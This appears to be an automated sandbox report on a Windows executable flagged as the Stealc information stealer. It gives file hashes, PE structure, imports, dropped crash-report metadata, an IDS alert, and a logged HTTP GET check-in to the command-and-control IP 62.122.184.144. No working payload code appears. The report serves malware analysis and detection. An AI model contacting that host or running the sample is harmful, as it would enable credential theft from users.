                                    Size (bytes):4619
                                    Entropy (8bit):4.502058329861588
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsiJg77aI9B2WpW8VYRYm8M4Jyki4FRAf+q8RkaTSSqRNWRfd:uIjfwI7zX7VhJykXEijmNRNWRfd
                                    MD5:61533072A3E8F6A04F0B1D96D5CFA113
                                    SHA1:DAA239ACD81538127847E4361A8F8A9B2B8D92FD
                                    SHA-256:ED18CA79E9923CD141222DD2D9CA5DA7DAF6F464B60D4DC6C75561ECAF58AF37
                                    SHA-512:602ADD91B164877D15FFA9E4673E082860E8D3A4FF4A43A7B93145A3BCC8F64CC15145005CA8A1E781FB812A1C594945248701D15723B4F8CA71C48C9313C4EA
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534075" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 06:13:02 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):101974
                                    Entropy (8bit):1.6964080987242265
                                    Encrypted:false
                                    SSDEEP:384:iz/t3GFXZAEFmsz+DG2Di0WUNv3y9zk8hHDKU0:I3GFXZAEFmrzNNvYRND
                                    MD5:E250908342728C3697A843939CEC5813
                                    SHA1:62E2E6ACF182A0A7FCDFB613D463A005A4FDBE67
                                    SHA-256:523C39191F2DECF9CC118F9785F073FB306D2381AF248141907E7550E5EE0EE6
                                    SHA-512:E9BAD394FAD388B864F5035CE6E7075324804A711E51C6C3BDD737164BA85A16B7E53DBCA8256DEA7CC7AFECE430DAF4D05057D66C0062526127CAD6685E33D0
                                    Malicious:false
                                    Preview:MDMP..a..... .......n..g........................(...............f;..........T.......8...........T............*..>d......................................................................................................eJ......8.......GenuineIntel............T...........g..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8374
                                    Entropy (8bit):3.7054003671931164
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJJPA6G6Y94SUDnWgmfuPnpB089bBKsf/QLm:R6lXJxA6G6YiSUDWgmfmpBpf/x
                                    MD5:58216FF3AA299CEF51A5166713CFB97D
                                    SHA1:A8D38A9F70FF9EB423C2C8A1D578B75BB56C11E3
                                    SHA-256:791F2DAD7CEFB820432CD1DFBE7A75D4F85E15849C8DBA59FB97FC42343B15C5
                                    SHA-512:0388B7FCE09ABDEB6DB7449624913D49A90339A7BFF2979579DFEFC397F4BB95DDAE121EA0D2582B0C89542737CD243A67340A9FFE76EA89B59428E60A651CBB
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.7.6.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4619
                                    Entropy (8bit):4.50455764963408
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsiJg77aI9B2WpW8VYmYm8M4Jyki4Fw+q8RkaTSSqRNWRfd:uIjfwI7zX7VWJykiijmNRNWRfd
                                    MD5:41331DFBFFB225EFC74D9A4AEE3117B2
                                    SHA1:18F531009811B0575703289B09C610F53940C359
                                    SHA-256:9528DA0006E070F884F40226063A9609B33D5CBB33E140DE8DC959CBE91A81CD
                                    SHA-512:99E281EBA7F740170BB069AF0C69F81EF6DA04CA55358C66C43072E7C64E5CCEB169B344633C23A547E505AD72F1C59B11C9703A898662033D4237617BC33D0D
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534075" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 06:13:03 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):114698
                                    Entropy (8bit):1.8167155976609255
                                    Encrypted:false
                                    SSDEEP:384:WWfGjrejTVAEFTsWx8gmub8BDiDTNvqDqE1fv8voviy4:krCAEtt6psuUNidfkvdy
                                    MD5:95E8A39EDDC0FA5DEA2D639146C603C9
                                    SHA1:6011466AF3AECD643617014FE31301DB2E3B1695
                                    SHA-256:26B31290FD8713FE220D6013924F839332333115845C20BF2E32F68C9DAA6BCC
                                    SHA-512:287F7F0AEFE4F5827CE93E7D566D25FF432924F23CD8694AFB46DFC2CD4B774EC00F7B3432FA1E11B8922A981604EAACD93E6DBB385543D39B58C1A972FB817E
                                    Malicious:false
                                    Preview:MDMP..a..... .......o..g........................................z@..........T.......8...........T...........X0..........................................................................................................eJ..............GenuineIntel............T...........g..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8374
                                    Entropy (8bit):3.706511029162543
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJJB6+6Y9QSUD6gmfuPnpBx89b4KsfkIm:R6lXJP6+6Y6SUD6gmfmm4pf6
                                    MD5:BE08574C599FADE54A55D024A5E122C3
                                    SHA1:A21D07D9BEED2483D513A719A4A6C82535789CA6
                                    SHA-256:CCF6A13A329E67CD843C8D75C0CEE23FF570D5C18836555287DC0B2AC01E3DDD
                                    SHA-512:2DDB8C52BED22A89A2780CE4F7DA37AF4BCB95BE31D29350007CFE7DCB3C73D1269A396E8E42BA36674223274A65CB4A7F99CF585CAAAB8247EADE33D93B9D4B
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.7.6.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4619
                                    Entropy (8bit):4.504589031794283
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsiJg77aI9B2WpW8VYJYm8M4Jyki4FVo+q8RkaTSSqRNWRfd:uIjfwI7zX7V5Jyk0ijmNRNWRfd
                                    MD5:89361B4643924AE4760A46ACF6E6773A
                                    SHA1:79EB7A47BDA22755EB69A32EB127C3CCC91C3041
                                    SHA-256:F952BA9A50E62E1DF6DB91E27EFBD36EFAD3A0CA27CF2EC6F75B26B4D2A20B0C
                                    SHA-512:404C96065B62D8BDDA90868A016F777BE7B94DBEC799797873C848FE364E81BCAEA8041A5B300A2B227E4DB0C8C873C300B0F6870F104F4419C6EBFF36CDAA41
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534075" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.465447567929113
                                    Encrypted:false
                                    SSDEEP:6144:YIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNadwBCswSbR:NXD94+WlLZMM6YFHg+R
                                    MD5:09D78389F81D610D99E369FC784D6F39
                                    SHA1:9E8586E4B4980E7B0CF78C3A79473D45ED3EE9A6
                                    SHA-256:53D292148D0A8DCBE95E00B029A564C3DDB029F813BC481833905A42C52004D6
                                    SHA-512:4F2FE841DA556F4B0015FB9418993AD55F1724C26ABAF3DA39B40CE665DC6740887376702DF4037C4979EBA396E78AA87C0AFA44D1E2F8ACAE360A4240399008
                                    Malicious:false
                                    Preview:regf<...<....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..f.I................................................................................................................................................................................................................................................................................................................................................aq+........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.052810827138817
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:gMkw55jZRs.exe
                                    File size:336'384 bytes
                                    MD5:cde961132c60bec82f2fd8340bf376b3
                                    SHA1:d5fd613509f43cf4b95de8ce6e7b5ec48b839c7f
                                    SHA256:f1cd9e91a933bb402f4103c1af878495bcbce2640ee3d13d1f7ee37e2f79bcd3
                                    SHA512:6fea55a7099b76f5acfa26be8196284bbfd3c9fc140002d6ff7b62fc31a522ff5c6a6fc59d8d92bdddaa59372323e4a22719d8670988ba154ab3154324c96638
                                    SSDEEP:6144:Q4L2rMvMs0Q2weocqjtMIsIWDl0uH/LnYBxgPDW:/arDsFnhEIWDlz/D+
                                    TLSH:6864B05076F2DC15F3FB8A725A78D6E8293BBDA66A71C15E1120F64F1CB63818D02B13
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@.....................................h......................................Rich............PE..L.....dd...................
                                    Icon Hash:17614cb2b24d3117
                                    Entrypoint:0x401667
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x646403D2 [Tue May 16 22:29:38 2023 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:fbc3e75f2d9f9185d8f077824c0d6c28
                                    Instruction
                                    call 00007F68E86DB374h
                                    jmp 00007F68E86D877Eh
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000328h
                                    mov dword ptr [004353C8h], eax
                                    mov dword ptr [004353C4h], ecx
                                    mov dword ptr [004353C0h], edx
                                    mov dword ptr [004353BCh], ebx
                                    mov dword ptr [004353B8h], esi
                                    mov dword ptr [004353B4h], edi
                                    mov word ptr [004353E0h], ss
                                    mov word ptr [004353D4h], cs
                                    mov word ptr [004353B0h], ds
                                    mov word ptr [004353ACh], es
                                    mov word ptr [004353A8h], fs
                                    mov word ptr [004353A4h], gs
                                    pushfd
                                    pop dword ptr [004353D8h]
                                    mov eax, dword ptr [ebp+00h]
                                    mov dword ptr [004353CCh], eax
                                    mov eax, dword ptr [ebp+04h]
                                    mov dword ptr [004353D0h], eax
                                    lea eax, dword ptr [ebp+08h]
                                    mov dword ptr [004353DCh], eax
                                    mov eax, dword ptr [ebp-00000320h]
                                    mov dword ptr [00435318h], 00010001h
                                    mov eax, dword ptr [004353D0h]
                                    mov dword ptr [004352CCh], eax
                                    mov dword ptr [004352C0h], C0000409h
                                    mov dword ptr [004352C4h], 00000001h
                                    mov eax, dword ptr [00434008h]
                                    mov dword ptr [ebp-00000328h], eax
                                    mov eax, dword ptr [0043400Ch]
                                    mov dword ptr [ebp-00000324h], eax
                                    call dword ptr [000000CCh]
                                    Programming Language:
                                    • [C++] VS2008 build 21022
                                    • [ASM] VS2008 build 21022
                                    • [ C ] VS2008 build 21022
                                    • [IMP] VS2005 build 50727
                                    • [RES] VS2008 build 21022
                                    • [LNK] VS2008 build 21022
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x336c40x3c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1120000x1d348.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x333f80x18.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x320000x184.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x3096f0x30a0014dd5504c700affdc2e52195318027faFalse0.9259820854755784data7.874919340123799IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x320000x1fa00x2000cbb94a8c54dfb9bbd30a01ee0dd3d905False0.3682861328125data5.598363170922723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x340000xda67c0x1400fd3fec2e0dd85ff994d41d51245d2885False0.168359375data1.822189692617974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .luvi0x10f0000x7c0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .tls0x1100000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .hoz0x1110000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1120000x14e3480x1d400fc99c7ea14f8cde61c85b6a3ab52ac99False0.4631159855769231data5.089447241678897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_CURSOR0x12a5580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                    RT_ICON0x112a300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5711620469083155
                                    RT_ICON0x1138d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.641245487364621
                                    RT_ICON0x1141800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6941244239631337
                                    RT_ICON0x1148480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7514450867052023
                                    RT_ICON0x114db00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5196058091286307
                                    RT_ICON0x1173580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.62406191369606
                                    RT_ICON0x1184000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6311475409836066
                                    RT_ICON0x118d880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7659574468085106
                                    RT_ICON0x1192680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39792110874200426
                                    RT_ICON0x11a1100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5022563176895307
                                    RT_ICON0x11a9b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5247695852534562
                                    RT_ICON0x11b0800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5606936416184971
                                    RT_ICON0x11b5e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3479253112033195
                                    RT_ICON0x11db900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37593808630394
                                    RT_ICON0x11ec380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.4
                                    RT_ICON0x11f5c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.41312056737588654
                                    RT_ICON0x11faa00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39792110874200426
                                    RT_ICON0x1209480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5591155234657039
                                    RT_ICON0x1211f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6169354838709677
                                    RT_ICON0x1218b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6416184971098265
                                    RT_ICON0x121e200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.43550656660412757
                                    RT_ICON0x122ec80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.42991803278688523
                                    RT_ICON0x1238500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.47606382978723405
                                    RT_ICON0x123d200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39792110874200426
                                    RT_ICON0x124bc80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5022563176895307
                                    RT_ICON0x1254700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5247695852534562
                                    RT_ICON0x125b380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5606936416184971
                                    RT_ICON0x1260a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3479253112033195
                                    RT_ICON0x1286480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37593808630394
                                    RT_ICON0x1296f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.4
                                    RT_ICON0x12a0780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.41312056737588654
                                    RT_STRING0x12a8600x476data0.44921190893169877
                                    RT_STRING0x12acd80x504data0.45794392523364486
                                    RT_STRING0x12b1e00x6b4data0.4324009324009324
                                    RT_STRING0x12b8980x760data0.4253177966101695
                                    RT_STRING0x12bff80x706data0.42880978865406005
                                    RT_STRING0x12c7000x8b8data0.4211469534050179
                                    RT_STRING0x12cfb80x6d2data0.4306987399770905
                                    RT_STRING0x12d6900x4a4data0.46380471380471383
                                    RT_STRING0x12db380x62edata0.4361567635903919
                                    RT_STRING0x12e1680x520data0.45198170731707316
                                    RT_STRING0x12e6880x722data0.4244249726177437
                                    RT_STRING0x12edb00x564data0.4391304347826087
                                    RT_STRING0x12f3180x2edata0.6304347826086957
                                    RT_GROUP_CURSOR0x12a6880x14data1.15
                                    RT_GROUP_ICON0x11fa280x76dataTurkishTurkey0.6694915254237288
                                    RT_GROUP_ICON0x12a4e00x76dataTurkishTurkey0.6694915254237288
                                    RT_GROUP_ICON0x1191f00x76dataTurkishTurkey0.6610169491525424
                                    RT_GROUP_ICON0x123cb80x68dataTurkishTurkey0.7211538461538461
                                    RT_VERSION0x12a6a00x1bcdata0.581081081081081
                                    DLLImport
                                    KERNEL32.dllSearchPathW, WriteConsoleOutputCharacterA, GetCommState, ReadConsoleA, InterlockedDecrement, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, ConnectNamedPipe, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, LoadLibraryW, GetConsoleMode, CopyFileW, ReadConsoleOutputW, GetConsoleAliasExesLengthW, FormatMessageW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesW, GetBinaryTypeA, ReleaseSemaphore, GetShortPathNameA, GetLastError, GetLongPathNameW, GetProcAddress, SetStdHandle, BuildCommDCBW, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, SetCalendarInfoW, FindAtomA, GetModuleFileNameA, GetDefaultCommConfigA, FatalAppExitA, GlobalReAlloc, GetVolumeInformationW, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
                                    USER32.dllSetFocus
                                    Language of compilation systemCountry where language is spokenMap
                                    TurkishTurkey
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-08T08:13:05.733660+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.44973262.122.184.14480TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 8, 2024 08:13:04.675405979 CEST4973280192.168.2.462.122.184.144
                                    Oct 8, 2024 08:13:04.680416107 CEST804973262.122.184.144192.168.2.4
                                    Oct 8, 2024 08:13:04.680515051 CEST4973280192.168.2.462.122.184.144
                                    Oct 8, 2024 08:13:04.680629969 CEST4973280192.168.2.462.122.184.144
                                    Oct 8, 2024 08:13:04.685400009 CEST804973262.122.184.144192.168.2.4
                                    Oct 8, 2024 08:13:05.396223068 CEST804973262.122.184.144192.168.2.4
                                    Oct 8, 2024 08:13:05.399533987 CEST4973280192.168.2.462.122.184.144
                                    Oct 8, 2024 08:13:05.402528048 CEST4973280192.168.2.462.122.184.144
                                    Oct 8, 2024 08:13:05.408158064 CEST804973262.122.184.144192.168.2.4
                                    Oct 8, 2024 08:13:05.733539104 CEST804973262.122.184.144192.168.2.4
                                    Oct 8, 2024 08:13:05.733659983 CEST4973280192.168.2.462.122.184.144
                                    Oct 8, 2024 08:13:10.738873005 CEST804973262.122.184.144192.168.2.4
                                    Oct 8, 2024 08:13:10.739314079 CEST4973280192.168.2.462.122.184.144
                                    Oct 8, 2024 08:13:22.570494890 CEST4973280192.168.2.462.122.184.144
                                    • 62.122.184.144
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.44973262.122.184.144806876C:\Users\user\Desktop\gMkw55jZRs.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 8, 2024 08:13:04.680629969 CEST89OUTGET / HTTP/1.1
                                    Host: 62.122.184.144
                                    Connection: Keep-Alive
